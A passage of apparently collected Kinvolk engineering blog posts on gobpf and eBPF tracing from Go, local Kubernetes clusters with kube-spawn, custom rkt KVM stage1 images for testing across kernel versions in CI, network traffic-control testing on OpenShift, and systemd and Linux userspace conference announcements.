                -I /lib/modules/$(uname)/build/arch/x86/include/generated \
                -o - | \
                llc -march=bpf -filetype=obj -o program.o

A small Go tool can then be used to load the object file and enable the kprobe with the help of gobpf:

// main.go

package main

import (


func main() {
        module := elf.NewModule("./program.o")
        if err := module.Load(nil); err != nil {
                fmt.Fprintf(os.Stderr, "Failed to load program: %v\n", err)
        defer func() {
                if err := module.Close(); err != nil {
                        fmt.Fprintf(os.Stderr, "Failed to close program: %v", err)

        if err := module.EnableKprobe("kprobe/SyS_open", 0); err != nil {
                fmt.Fprintf(os.Stderr, "Failed to enable kprobe: %v\n", err)

        sig := make(chan os.Signal, 1)
        signal.Notify(sig, os.Interrupt, os.Kill)


Now every time a process uses open(2), the kprobe will log a message. Messages written with bpf_trace_printk can be seen in the trace_pipe “live trace”:

sudo cat /sys/kernel/debug/tracing/trace_pipe

With go-bindata it’s possible to bundle the compiled BPF program into the Go binary to build a single fat binary that can be shipped and installed conveniently.

Trace user-level functions with bcc and uprobes

Louis McCormack contributed support for uprobes in and therefore it is now possible to trace user-level function calls. For example, to trace all readline() function calls from /bin/bash processes, you can run the bash_readline.go demo:

sudo -E go run ./examples/bcc/bash_readline/bash_readline.go

More supported program types for gobpf/elf

gobpf/elf learned to load programs of type TRACEPOINT, SOCKET_FILTER, CGROUP_SOCK and CGROUP_SKB:


A program of type TRACEPOINT can be attached to any Linux tracepoint. Tracepoints in Linux are “a hook to call a function (probe) that you can provide at runtime.” A list of available tracepoints can be obtained with find /sys/kernel/debug/tracing/events -type d.

Socket filtering

Socket filtering is the mechanism used by tcpdump to retrieve packets matching an expression. With SOCKET_FILTER programs, we can filter data on a socket by attaching them with setsockopt(2).


CGROUP_SOCK and CGROUP_SKB can be used to load and use programs specific to a cgroup. CGROUP_SOCK programs “run any time a process in the cgroup opens an AF_INET or AF_INET6 socket” and can be used to enable socket modifications. CGROUP_SKB programs are similar to SOCKET_FILTER and are executed for each network packet with the purpose of cgroup specific network filtering and accounting.

Continuous integration

We have setup continuous integration and written about how we use custom rkt stage1 images to test against various kernel versions. At the time of writing, gobpf has elementary tests to verify that programs and their sections can be loaded on kernel versions 4.4, 4.9 and 4.10 but no thorough testing of all functionality and features yet (e.g. perf map polling).


Thanks to contributors and clients

In closing, we’d like to thank all those who have contributed to gobpf. We look forward to merging more commits from contributors and seeing how others make use of gopbf.

A special thanks goes to Weaveworks for funding the work from which gobpf was born. Continued contributions have been possible through other clients, for whom we are helping build products (WIP) that leverage gobpf.

Introducing kube-spawn: a tool to create local, multi-node Kubernetes clusters

kube-spawn is a tool to easily start a local, multi-node Kubernetes cluster on a Linux machine. While its original audience was mainly developers of Kubernetes, it’s turned into a tool that is great for just trying Kubernetes out and exploring. This article will give a general introduction to kube-spawn and show how to use it.


kube-spawn aims to become the easiest means of testing and fiddling with Kubernetes on Linux. We started the project because it is still rather painful to start a multi-node Kubernetes cluster on our development machines. And the tools that do provide this functionality generally do not reflect the environments that Kubernetes will eventually be running on, a full Linux OS.

Running a Kubernetes cluster with kube-spawn

So, without further ado, let’s start our cluster. With one command kube-spawn fetches the Container Linux image, prepares the nodes, and deploys the cluster. Note that you can also do these steps individually with machinectl pull-raw, and the kube-spawn setup and init subcommands. But the up subcommand does this all for us.

$ sudo GOPATH=$GOPATH CNI_PATH=$GOPATH/bin ./kube-spawn up --nodes=3

When that command completes, you’ll have a 3-node Kubernetes cluster. You’ll need to wait for the nodes to be ready before its useful.

$ export KUBECONFIG=$GOPATH/src/
$ kubectl get nodes
NAME           STATUS    AGE       VERSION
kube-spawn-0   Ready     1m        v1.7.0
kube-spawn-1   Ready     1m        v1.7.0
kube-spawn-2   Ready     1m        v1.7.0

Looks like all the nodes are ready. Let’s move on.

The demo app

In order to test that our cluster is working we’re going to deploy the microservices demo, Sock Shop, from our friends at Weaveworks. The Sock Shop is a complex microservices app that uses many components commonly found in real-world deployments. So it’s good to test that everything is working and gives us something more substantial to explore than a hello world app.

Cloning the demo app

To proceed, you’ll need to clone the microservices-demo repo and navigate to the deploy/kubernetes folder.

$ cd ~/repos
$ git clone sock-shop
$ cd sock-shop/deploy/kubernetes/

Deploying the demo app

Now that we have things in place, let’s deploy. We first need to create the sock-shop namespace that the deployment expects.

$ kubectl create namespace sock-shop
namespace "sock-shop" created

With that, we’ve got all we need to deploy the app

$ kubectl create -f complete-demo.yaml
deployment "carts-db" created
service "carts-db" created
deployment "carts" created
service "carts" created
deployment "catalogue-db" created
service "catalogue-db" created
deployment "catalogue" created
service "catalogue" created
deployment "front-end" created
service "front-end" created
deployment "orders-db" created
service "orders-db" created
deployment "orders" created
service "orders" created
deployment "payment" created
service "payment" created
deployment "queue-master" created
service "queue-master" created
deployment "rabbitmq" created
service "rabbitmq" created
deployment "shipping" created
service "shipping" created
deployment "user-db" created
service "user-db" created
deployment "user" created
service "user" created

Once that completes, we still need to wait for all the pods to come up.

$ watch kubectl -n sock-shop get pods
NAME                            READY     STATUS    RESTARTS   AGE
carts-2469883122-nd0g1          1/1       Running   0          1m
carts-db-1721187500-392vt       1/1       Running   0          1m
catalogue-4293036822-d79cm      1/1       Running   0          1m
catalogue-db-1846494424-njq7h   1/1       Running   0          1m
front-end-2337481689-v8m2h      1/1       Running   0          1m
orders-733484335-mg0lh          1/1       Running   0          1m
orders-db-3728196820-9v07l      1/1       Running   0          1m
payment-3050936124-rgvjj        1/1       Running   0          1m
queue-master-2067646375-7xx9x   1/1       Running   0          1m
rabbitmq-241640118-8htht        1/1       Running   0          1m
shipping-2463450563-n47k7       1/1       Running   0          1m
user-1574605338-p1djk           1/1       Running   0          1m
user-db-3152184577-c8r1f        1/1       Running   0          1m

Accessing the sock shop

When they’re all ready, we have to find out which port and IP address we use to access the shop. For the port, let’s see which port the front-end services is using.

$ kubectl -n sock-shop get svc
NAME           CLUSTER-IP       EXTERNAL-IP   PORT(S)        AGE
carts    <none>        80/TCP         3m
carts-db    <none>        27017/TCP      3m
catalogue     <none>        80/TCP         3m
catalogue-db     <none>        3306/TCP       3m
front-end   <nodes>       80:30001/TCP   3m
orders   <none>        80/TCP         3m
orders-db   <none>        27017/TCP      3m
payment    <none>        80/TCP         3m
queue-master     <none>        80/TCP         3m
rabbitmq    <none>        5672/TCP       3m
shipping     <none>        80/TCP         3m
user      <none>        80/TCP         3m
user-db      <none>        27017/TCP      3m

Here we see that the front-end is exposed on port 30001 and it uses the external IP. This means that we can access the front-end services using any worker node IP address on port 30001. machinectl gives us each node’s IP address.

$ machinectl
kube-spawn-0 container systemd-nspawn coreos 1492.1.0
kube-spawn-1 container systemd-nspawn coreos 1492.1.0
kube-spawn-2 container systemd-nspawn coreos 1492.1.0

Remember, the first node is the master node and all the others are worker nodes. So in our case, we can open our browser to or and should be greeted by a shop selling socks.

Stopping the cluster

Once you’re done with your sock purchases, you can stop the cluster.

$ sudo ./kube-spawn stop
2017/08/10 01:58:00 turning off machines [kube-spawn-0 kube-spawn-1 kube-spawn-2]...
2017/08/10 01:58:00 All nodes are stopped.

A guided demo

If you’d like a more guided tour, you’ll find it here.

As mentioned in the video, kube-spawn creates a .kube-spawn directory in the current directory where you’ll find several files and directories under the default directory. In order to not be constrained by the size of each OS Container, we mount each node’s /var/lib/docker directory here. In this way, we can make use of the host’s disk space. Also, we don’t currently have a clean command. So you can run rm -rf .kube-spawn/ if you want to completely clean up things.


We hope you find kube-spawn as useful as we do. For us, it’s the easiest way to test changes to Kubernetes or spin up a cluster to explore Kubernetes.

There are still lots of improvements (some very obvious) that can be made. PRs are very much welcome!

All Systems Go! - The Userspace Linux Conference

At Kinvolk we spend a lot of time working on and talking about the Linux userspace. We can regularly be found presenting our work at various events and discussing the details of our work with those who are interested. These events are usually either very generally about open source, or focused on a very specific technology, like containers, systemd, or ebpf. While these events are often awesome, and absolutely essential, they simply have a focus that is either too broad, or too specific.

What we felt was missing was an event focused on the Linux userspace itself, and less on the projects and products built on top, or the kernel below. This is the focus of All Systems Go! and why we are excited to be a part of it.

All Systems Go! is designed to be a community event. Tickets to All Systems Go! are affordable — starting at less than 30 EUR — and the event takes place during the weekend, making it more accessible to hobbyists and students. It’s also conveniently scheduled to fall between DockerCon EU in Copenhagen and Open Source Summit in Prague.


To make All Systems Go! work, we’ve got to make sure that we get the people to attend who are working at this layer of the system, and on the individual projects that make up the Linux userspace. As a start, we’ve invited a first round of speakers, who also happen to be the CFP selection committee. We’re very happy to welcome to the All Systems Go! team…

While we’re happy to have this initial group of speakers, what’s really going to make All Systems Go! awesome are all the others in the community who submit their proposals and offer their perspectives and voices.


Sponsors are crucial to open source community events. All Systems Go! is no different. In fact, sponsors are essential to keeping All Systems Go! an affordable and accessible event.

We will soon be announcing our first round of sponsors. If your organization would like to be amongst that group please have a look at our sponsorship prospectus and get in touch.

See you there!

We’re looking forward to welcoming the Linux userspace community to Berlin. Hope to see you there!

Using custom rkt stage1 images to test against various kernel versions


When writing software that is tightly coupled with the Linux kernel, it is necessary to test on multiple versions of the kernel. This is relatively easy to do locally with VMs, but when working on open-source code hosted on Github, one wants to make these tests a part of the project’s continuous integration (CI) system to ensure that each pull request runs the tests and passes before merging.

Most CI systems run tests inside containers and, very sensibly, use various security mechanisms to restrict what the code being tested can access. While this does not cause problems for most use cases, it does for us. It blocks certain syscalls that are needed to, say, test a container runtime like rkt, or load ebpf programs into the kernel for testing, like we need to do to test gobpf and tcptracer-bpf. It also doesn’t allow us to run virtual machines which we need to be able to do to run tests on different versions of the kernel.

Finding a continuous integration service

While working on the rkt project, we did a survey of CI systems to find the ones that we could use to test rkt itself. Because of the above-stated requirements, it was clear that we needed one that gave us the option to run tests inside a virtual machine. This makes the list rather small; in fact, we were left with only SemaphoreCI.

SemaphoreCI supports running Docker inside of the test environment. This is possible because the test environment they provide for this is simply a VM. For rkt, this allowed us to run automatic tests for the container runtime each time a PR was submitted and/or changed.

However, it doesn’t solve the problem of testing on various kernels and kernel configurations as we want for gobpf and tcptracer-bpf. Luckily, this is where rkt and its KVM stage1 come to the rescue.

Our solution

To continuously test the work we are doing on Weave Scope, tpctracer-bpf and gobpf, we not only need a relatively new Linux kernel, but also require a subset of features like CONFIG_BPF=y or CONFIG_HAVE_KPROBES=y to be enabled.

With rkt’s KVM stage1 we can run our software in a virtual machine and, thanks to rkt’s modular architecture, build and use a custom stage1 suited to our needs. This allows us to run our tests on any platform that allows rkt to run; in our case, Semaphore CI.

Building a custom rkt stage1 for KVM

Our current approach relies on App Container Image (ACI) dependencies. All of our custom stage1 images are based on rkt’s In this way, we can apply changes to particular components (e.g. the Linux kernel) while reusing the other parts of the upstream stage1 image.

An ACI manifest template for such an image could look like the following.

        "acKind": "ImageManifest",
        "acVersion": "0.8.9",
        "name": "{{kernel_version}}",
        "labels": [
                        "name": "arch",
                        "value": "amd64"
                        "name": "os",
                        "value": "linux"
                        "name": "version",
                        "value": "0.1.0"
        "annotations": [
                        "name": "",
                        "value": "/init"
                        "name": "",
                        "value": "/enter_kvm"
                        "name": "",
                        "value": "/gc"
                        "name": "",
                        "value": "/stop_kvm"
                        "name": "",
                        "value": "/app-add"
                        "name": "",
                        "value": "/app-rm"
                        "name": "",
                        "value": "/app-start"
                        "name": "",
                        "value": "/app-stop"
                        "name": "",
                        "value": "5"
        "dependencies": [
                        "imageName": "",
                        "labels": [
                                        "name": "os",
                                        "value": "linux"
                                        "name": "arch",
                                        "value": "amd64"
                                        "name": "version",
                                        "value": "1.23.0"

Note: rkt doesn’t automatically fetch stage1 dependencies and we have to pre-fetch those manually.

To build a kernel (arch/x86/boot/bzImage), we use make bzImage after applying a single patch to the source tree. Without the patch, the kernel would block and not return control to rkt.

# change directory to kernel source tree
curl -LsS -O
patch --silent -p1 < 0001-reboot.patch
# configure kernel
make bzImage

We now can combine the ACI manifest with a root filesystem holding our custom built kernel, for example:

├── manifest
└── rootfs
    └── bzImage

We are now ready to build the stage1 ACI with actool:

actool build --overwrite aci/4.9.4 my-custom-stage1-kvm.aci

Run rkt with a custom stage1 for KVM

rkt offers multiple command line flags to be provided with a stage1; we use --stage1-path=. To smoke test our newly built stage1, we run a Debian Docker container and call uname -r so we make sure our custom built kernel is actually used:

rkt fetch image # due to rkt issue #2241
rkt run \
  --insecure-options=image \
  --stage1-path=./my-custom-stage1-kvm.aci \
  docker://debian --exec=/bin/uname -- -r

We set CONFIG_LOCALVERSION="-kinvolk-v1" in the kernel config and the version is correctly shown as 4.9.4-kinvolk-v1.

Run on Semaphore CI

Semaphore does not include rkt by default on their platform. Hence, we have to download rkt in as a first step:


readonly rkt_version="1.23.0"

if [[ ! -f "./rkt/rkt" ]] || \
  [[ ! "$(./rkt/rkt version | awk '/rkt Version/{print $3}')" == "${rkt_version}" ]]; then

  curl -LsS "${rkt_version}/rkt-v${rkt_version}.tar.gz" \
    -o rkt.tgz

  mkdir -p rkt
  tar -xvf rkt.tgz -C rkt --strip-components=1


After that we can pre-fetch the stage1 image we depend on and then run our tests. Note that we now use ./rkt/rkt. And we use timeout to make sure our tests fail if they cannot be finished in a reasonable amount of time.


sudo ./rkt/rkt image fetch --insecure-options=image
sudo timeout --foreground --kill-after=10 5m \
  ./rkt/rkt \
  --uuid-file-save=./rkt-uuid \
  --insecure-options=image,all-run \
  --stage1-path=./rkt/my-custom-stage1-kvm.aci \
  --exec=/bin/sh -- -c \
  'cd /go/... ; \
    go test -v ./...'

--uuid-file-save=./rkt-uuid is required to determine the UUID of the started container from to read its exit status (since it is not propagated on the KVM stage1) after the test finished and exit accordingly:


test_status=$(sudo ./rkt/rkt status $(<rkt-uuid) | awk '/app-/{split($0,a,"=")} END{print a[2]}')
exit $test_status

Bind mount directories from stage1 into stage2

If you want to provide data to stage2 from stage1 you can do this with a small systemd drop-in unit to bind mount the directories. This allows you to add or modify content without actually touching the stage2 root filesystem.

We did the following to provide the Linux kernel headers to stage2:

# add systemd drop-in to bind mount kernel headers
mkdir -p "${rootfs_dir}/etc/systemd/system/[email protected]"
cat <<EOF >"${rootfs_dir}/etc/systemd/system/[email protected]/10-bind-mount-kernel-header.conf"
ExecStartPost=/usr/bin/mkdir -p %I/${kernel_header_dir}
ExecStartPost=/usr/bin/mount --bind "${kernel_header_dir}" %I/${kernel_header_dir}

Note: for this to work you need to have mkdir in stage1, which is not included in the default rkt stage1-kvm. We use the one from busybox:

Automating the steps

We want to be able to do this for many kernel versions. Thus, we have created a tool, stage1-builder, that does most of this for us. With stage1-builder you simply need to add the kernel configuration to the config directory and run the ./builder script. The result is an ACI file containing our custom kernel with a dependency on the upstream kvm-stage1.


With SemaphoreCI providing us with a proper VM and rkt’s modular stage1 architecture, we have put together a CI pipeline that allows us to test gobpf and tcptracer-bpf on various kernels. In our opinion this setup is much preferable to the alternative, setting up and maintaining Jenkins.

Interesting to point out is that we did not have to use or make changes to rkt’s build system. Leveraging ACI dependencies was all we needed to swap out the KVM stage1 kernel. For the simple case of testing software on various kernel versions, rkt’s modular design has proven to be very useful.

Kinvolk Presenting at FOSDEM 2017

The same procedure as last year, Miss Sophie?
The same procedure as every year, James!

As with every year, we’ve reserved the first weekend of February to attend FOSDEM, the premier open-source conference in Europe. We’re looking forward to having drinks and chatting with other open-source contributors and enthusiasts.

But it’s not all fun and games for us. The Kinvolk team has three talks; one each in the Go, Testing and Automation, & Linux Containers and Microservices devrooms.

The talks

We look forward to sharing our work and having conversations about the following topics…

If you’ll be there and are interested in those, or other projects we work on, please do track us down.

We look forward to seeing you there!

Introducing gobpf - Using eBPF from Go

Gopher by Takuya Ueda - CC BY 3.0

What is eBPF?

eBPF is a “bytecode virtual machine” in the Linux kernel that is used for tracing kernel functions, networking, performance analysis and more. Its roots lay in the Berkley Packet Filter (sometimes called LSF, Linux Socket Filtering), but as it supports more operations (e.g. BPF_CALL 0x80 /* eBPF only: function call */) and nowadays has much broader use than packet filtering on a socket, it’s called extended BPF.

With the addition of the dedicated bpf() syscall in Linux 3.18, it became easier to perform the various eBPF operations. Further, the BPF compiler collection from the IO Visor Project and its libbpf provide a rich set of helper functions as well as Python bindings that make it more convenient to write eBPF powered tools.

To get an idea of how eBPF looks, let’s take a peek at struct bpf_insn prog[]

  • a list of instructions in pseudo-assembly. Below we have a simple user-space C program to count the number of fchownat(2) calls. We use bpf_prog_load from libbpf to load the eBPF instructions as a kprobe and use bpf_attach_kprobe to attach it to the syscall. Now each time fchownat is called, the kernel executes the eBPF program. The program loads the map (more about maps later), increments the counter and exits. In the C program, we read the value from the map and print it every second.
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#include <linux/version.h>

#include <bcc/bpf_common.h>
#include <bcc/libbpf.h>

int main() {
	int map_fd, prog_fd, key=0, ret;
	long long value;
	char log_buf[8192];
	void *kprobe;

	/* Map size is 1 since we store only one value, the chown count */
	map_fd = bpf_create_map(BPF_MAP_TYPE_HASH, sizeof(key), sizeof(value), 1);
	if (map_fd < 0) {
		fprintf(stderr, "failed to create map: %s (ret %d)\n", strerror(errno), map_fd);
		return 1;

	ret = bpf_update_elem(map_fd, &key, &value, 0);
	if (ret != 0) {
		fprintf(stderr, "failed to initialize map: %s (ret %d)\n", strerror(errno), ret);
		return 1;

	struct bpf_insn prog[] = {
		/* Put 0 (the map key) on the stack */
		BPF_ST_MEM(BPF_W, BPF_REG_10, -4, 0),
		/* Put frame pointer into R2 */
		/* Decrement pointer by four */
		/* Put map_fd into R1 */
		BPF_LD_MAP_FD(BPF_REG_1, map_fd),
		/* Load current count from map into R0 */
		/* If returned value NULL, skip two instructions and return */
		/* Put 1 into R1 */
		BPF_MOV64_IMM(BPF_REG_1, 1),
		/* Increment value by 1 */
		/* Return from program */

	prog_fd = bpf_prog_load(BPF_PROG_TYPE_KPROBE, prog, sizeof(prog), "GPL", LINUX_VERSION_CODE, log_buf, sizeof(log_buf));
	if (prog_fd < 0) {
		fprintf(stderr, "failed to load prog: %s (ret %d)\ngot CAP_SYS_ADMIN?\n%s\n", strerror(errno), prog_fd, log_buf);
		return 1;

	kprobe = bpf_attach_kprobe(prog_fd, "p_sys_fchownat", "p:kprobes/p_sys_fchownat sys_fchownat", -1, 0, -1, NULL, NULL);
	if (kprobe == NULL) {
		fprintf(stderr, "failed to attach kprobe: %s\n", strerror(errno));
		return 1;

	for (;;) {
		ret = bpf_lookup_elem(map_fd, &key, &value);
		if (ret != 0) {
			fprintf(stderr, "failed to lookup element: %s (ret %d)\n", strerror(errno), ret);
		} else {
			printf("fchownat(2) count: %lld\n", value);

	return 0;

The example requires libbcc and can be compiled with:

gcc -I/usr/include/bcc/compat main.c -o chowncount -lbcc

Nota bene: the increment in the example code is not atomic. In real code, we would have to use one map per CPU and aggregate the result.

It is important to know that eBPF programs run directly in the kernel and that their invocation depends on the type. They are executed without change of context. As we have seen above, kprobes for example are triggered whenever the kernel executes a specified function.

Thanks to clang and LLVM, it’s not necessary to actually write plain eBPF instructions. Modules can be written in C and use functions provided by libbpf (as we will see in the gobpf example below).

eBPF Program Types

The type of an eBPF program defines properties like the kernel helper functions available to the program or the input it receives from the kernel. Linux 4.8 knows the following program types:

enum bpf_prog_type {

A program of type BPF_PROG_TYPE_SOCKET_FILTER, for instance, receives a struct __sk_buff * as its first argument whereas it’s struct pt_regs * for programs of type BPF_PROG_TYPE_KPROBE.

eBPF Maps

Maps are a “generic data structure for storage of different types of data” and can be used to share data between eBPF programs as well as between kernel and userspace. The key and value of a map can be of arbitrary size as defined when creating the map. The user also defines the maximum number of entries (max_entries). Linux 4.8 knows the following map types:

enum bpf_map_type {

While BPF_MAP_TYPE_HASH and BPF_MAP_TYPE_ARRAY are generic maps for different types of data, BPF_MAP_TYPE_PROG_ARRAY is a special purpose array map. It holds file descriptors referring to other eBPF programs and can be used by an eBPF program to “replace its own program flow with the one from the program at the given program array slot”. The BPF_MAP_TYPE_PERF_EVENT_ARRAY map is for storing a data of type struct perf_event in a ring buffer.

In the example above we used a map of type hash with a size of 1 to hold the call counter.


In the context of the work we are doing on Weave Scope for Weaveworks, we have been working extensively with both eBPF and Go. As Scope is written in Go, it makes sense to use eBPF directly from Go.

In looking at how to do this, we stumbled upon some code in the IO Visor Project that looked like a good starting point. After talking to the folks at the project, we decided to move this out into a dedicated repository: gobpf is a Go library that leverages the bcc project to make working with eBPF programs from Go simple.

To get an idea of how this works, the following example chrootsnoop shows how to use a bpf.PerfMap to monitor chroot(2) calls:

package main

import (


import "C"

const source string = `
#include <uapi/linux/ptrace.h>
#include <bcc/proto.h>

typedef struct {
	u32 pid;
	char comm[128];
	char filename[128];
} chroot_event_t;


int kprobe__sys_chroot(struct pt_regs *ctx, const char *filename)
	u64 pid = bpf_get_current_pid_tgid();
	chroot_event_t event = {
		.pid = pid >> 32,
	bpf_get_current_comm(&event.comm, sizeof(event.comm));
	bpf_probe_read(&event.filename, sizeof(event.filename), (void *)filename);
	chroot_events.perf_submit(ctx, &event, sizeof(event));
	return 0;

type chrootEvent struct {
	Pid      uint32
	Comm     [128]byte
	Filename [128]byte

func main() {
	m := bpf.NewBpfModule(source, []string{})
	defer m.Close()

	chrootKprobe, err := m.LoadKprobe("kprobe__sys_chroot")
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to load kprobe__sys_chroot: %s\n", err)

	err = m.AttachKprobe("sys_chroot", chrootKprobe)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to attach kprobe__sys_chroot: %s\n", err)

	chrootEventsTable := bpf.NewBpfTable(0, m)

	chrootEventsChannel := make(chan []byte)

	chrootPerfMap, err := bpf.InitPerfMap(chrootEventsTable, chrootEventsChannel)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to init perf map: %s\n", err)

	sig := make(chan os.Signal, 1)
	signal.Notify(sig, os.Interrupt, os.Kill)

	go func() {
		var chrootE chrootEvent
		for {
			data := <-chrootEventsChannel
			err := binary.Read(bytes.NewBuffer(data), binary.LittleEndian, &chrootE)
			if err != nil {
				fmt.Fprintf(os.Stderr, "Failed to decode received chroot event data: %s\n", err)
			comm := (*C.char)(unsafe.Pointer(&chrootE.Comm))
			filename := (*C.char)(unsafe.Pointer(&chrootE.Filename))
			fmt.Printf("pid %d %s called chroot(2) on %s\n", chrootE.Pid, C.GoString(comm), C.GoString(filename))


You will notice that our eBPF program is written in C for this example. The bcc project uses clang to convert the code to eBPF instructions.

We don’t have to interact with libbpf directly from our Go code, as gobpf implements a callback and makes sure we receive the data from our eBPF program through the chrootEventsChannel.

To test the example, you can run it with sudo -E go run chrootsnoop.go and for instance execute any systemd unit with RootDirectory statement. A simple chroot ... also works, of course.

# hello.service
Description=hello service



You should see output like:

pid 7857 (hello) called chroot(2) on /tmp/chroot


With its growing capabilities, eBPF has become an indispensable tool for modern Linux system software. gobpf helps you to conveniently use libbpf functionality from Go.

gobpf is in a very early stage, but usable. Input and contributions are very much welcome.

If you want to learn more about our use of eBPF in software like Weave Scope, stay tuned and have a look at our work on GitHub:

Follow Kinvolk on Twitter to get notified when new blog posts go live.

Testing web services with traffic control on Kubernetes

This is part 2 of our “testing applications with traffic control series”. See part 1, testing degraded network scenarios with rkt, for detailed information about how traffic control works on Linux.

In this installment we demonstrate how to test web services with traffic control on Kubernetes. We introduce tcd, a simple traffic control daemon developed by Kinvolk for this demo. Our demonstration system runs on Openshift 3, Red Hat’s Container Platform based on Kubernetes, and uses the excellent Weave Scope, an interactive container monitoring and visualization tool.

We’ll be giving a live demonstration of this at the OpenShift Commons Briefing on May 26th, 2016. Please join us there.

The premise

As discussed in part 1 of this series, tests generally run under optimal networking conditions. This means that standard testing procedures neglect a whole bevy of issues that can arise due to poor network conditions.

Would it not be prudent to also test that your services perform satisfactorily when there is, for example, high packet loss, high latency, a slow rate of transmission, or a combination of those? We think so, and if you do too, please read on.

Traffic control on a distributed system

Let’s now make things more concrete by using tcd in our Kubernetes cluster.

The setup

To get started, we need to start an OpenShift ready VM to provide us our Kubernetes cluster. We’ll then create an OpenShift project and do some configuration.

If you want to follow along, you can go to our demo repository which will guide you through installing and setting up things. The pieces Before diving into the traffic control demo, we want to give you a really quick overview of tcd, OpenShift and Weave Scope.

tcd (traffic control daemon)

tcd is a simple daemon that runs on each Kubernetes node and responds to API calls. tcd manipulates the traffic control settings of the pods using the tc command which we briefly mentioned in part 1. It’s decoupled from the service being tested, meaning you can stop and restart the daemon on a pod without affecting its connectivity.

In this demo, it receives commands from buttons exposed in Weave Scope.


OpenShift is Red Hat’s container platform that makes it simple to build, deploy, manage and secure containerized applications at scale on any cloud infrastructure, including Red Hat’s own hosted offering, OpenShift Dedicated. Version 3 of OpenShift uses Kubernetes under the hood to maintain cluster health and easily scale services.

In the following figure, you see an example of the OpenShift dashboard with the running pods.

Here we have 1 Weave Scope App pod, 3 ping test pods, 1 tcd pod, and one Weave Scope App. Using the arrow buttons one can scale the application up and down and the circle changes color depending on the status of the application (e.g. scaling, terminating, etc.).

Weave Scope

Weave Scope helps to intuitively understand, monitor, and control containerized applications. It visually represents pods and processes running on Kubernetes and allows one to drill into pods, showing information such as CPU & memory usage, running processes, etc. One can also stop, start, and interact with containerized applications directly through its UI.

While this graphic shows Weave Scope displaying containers, we see at the top that we can also display information about processes and hosts.

How the pieces fit together

Now that we understand the individual pieces, let’s see how it all works together. Below is a diagram of our demo system.

Here we have 2 Kubernetes nodes each running one instance of the tcd daemon. tcd can only manage the traffic control settings of pods local to the Kubernetes node on which it’s running, thus the need for one per node.

On the right we see the Weave Scope app showing details for the selected pod; in this case, the one being pointed to by (4). In the red oval, we see the three buttons we’ve added to Scope app for this demo. These set the network connectivity parameters of the selected pod’s egress traffic to a latency of 2000ms, 300ms, 1ms, respectively, from left to right.

When clicked (1), the scope app sends a message (2) to the Weave Scope probe running on the selected pod’s Kubernetes node. The Weave Scope probe sends a gRPC message (3) to the tcd daemon, in this case a ConfigureEgressMethod message, running on its Kubernetes node telling it to configure the pods egress traffic (4) accordingly.

While this demo only configures the latency, tcd can also be used to configure the bandwidth and the percentage of packet drop. As we saw in part 1, those parameters are features directly provided by the Linux netem queuing discipline.

Being able to dynamically change the network characteristics for each pod, we can observe the behaviour of services during transitions as well as in steady state. Of course, by observe we mean test,which we’ll turn to now.

Testing with traffic control

Now for 2 short demos to show how traffic control can be used for testing.

Ping test

This is a contrived demo to show that the setup works and we can, in fact, manipulate the egress traffic characteristics of a pod.

The following video shows a pod downloading a small file from Internet with the wget command, with the target host being the one for which we are adjusting the packet latency.

It should be easy to see the affects that adjusting the latency has; with greater latency it takes longer to get a reply.

Guestbook app test

We use the Kubernetes guestbook example for our next, more real-world, demo. Some small modifications have been made to provide user-feedback when the reply from the web server takes a long time, showing a “loading…” message. Generally, this type of thing goes untested because, as we mentioned in the introduction, our tests run under favorable networking conditions.

Tools like Selenium and agouti allow for testing web applications in an automated way without manually interacting with a browser. For this demo we’ll be using agouti with its Chrome backend so that we can see the test run.

In the following video we see this feature being automatically tested by a Go script using the Ginkgo testing framework and Gomega matcher library.

In this demo, testers still need to configure the traffic control latency manually by clicking on the Weave Scope app buttons before running the test. However, since tcd can accept commands over gRPC, the Go script could easily connect to tcd to perform that configuration automatically, and dynamically, at run time. We’ll leave that as an exercise for the reader. :)


With Kubernetes becoming a defacto building block of modern container platforms, we now have a basis on which to start integrating features in a standardized way that have long gone ignored. We think traffic control for testing, and other creative endeavors, is a good example of this.

If you’re interested in moving this forward, we encourage you to take what we’ve started and run with it. And whether you just want to talk to us about this or you need professional support in your efforts, we’d be happy to talk to you.

Thanks to…

We’d like to thank Ilya & Tom from Weaveworks and Jorge & Ryan from Red Hat for helping us with some technical issues we ran into while setting up this demo. And a special thanks to Diane from the OpenShift project for helping coordinate the effort.

Introducing systemd.conf 2016

The systemd project will be having its 2nd conference—systemd.conf—from Sept. 28th to Oct. 1st, once again at betahaus in Berlin. After the success of last year’s conference, we’re looking forward to having much of the systemd community in Berlin for a second consecutive year. As this year’s event takes place just before LinuxCon Europe, we’re expecting some new faces.

Kinvolk’s involvement

As an active user and contributor to systemd, currently through our work on rkt, we’re interested in promoting systemd and helping provide a place for the systemd community to gather.

Last year, Kinvolk helped with much of the organization. This year, we’re happy to be expanding our involvement to include handling the financial-side of the event.

In general, Kinvolk is willing to help provide support to open source projects who want to hold events in Berlin. Just send us a mail to [email protected].

Don’t fix what isn’t broken

As feedback from last year’s post–conference survey showed, most attendees were pleased with the format. Thus, this year very little will change. The biggest difference is that we’re adding another room to accommodate a few more people and to facilitate impromptu breakout sessions. Some other small changes are that we’ll have warm lunches instead of sandwiches and we’ve dropped the speakers dinner as we felt it wasn’t in line with the goal of bringing all attendees together.

Workshop day

A new addition to systemd.conf, is the workshop day. The audience for systemd.conf 2015 was predominantly systemd contributors and proficient users. This was very much expected and intended.

However, we also want to give people of varying familiarity with the systemd project the chance to learn more from the people who know it best. The workshop day is intended to facilitate this. The call for presentations (CfP) will include a call for workshop sessions. These workshop sessions will be 2 to 3-hour hands-on sessions covering various areas of, or related to, the systemd project. You can consider it a day of systemd training if that helps with getting approval to attend. :)

As we expect a different audience for workshops than for the presentation and hackfest days, we will be issuing separate tickets. Tickets will become available once the call for participation opens.

Get involved!

There are several ways you can help make systemd.conf 2016 a success.

Become a sponsor

These events are only possible with the support of sponsors. In addition to helping the event be more awesome, your sponsorship allows us to bring more of the community together by sponsoring the attendance of those community member that need financial assistance to attend.

See the systemd.conf 2016 website for how to become a sponsor.

Submitting talk and workshop proposals

systemd.conf is only as good as the people who attend and the content they provide. In a few weeks we’ll be announcing the opening of the CfP. If you, or your organization, is doing interesting things with systemd, we encourage you to submit a proposal. If you want to spread your knowledge of systemd with others, please consider submitting a proposal for a workshop session.

We’re excited about what this year’s event will bring and look forward to seeing you at systemd.conf 2016!

Testing Degraded Network Scenarios with rkt

The current state of testing

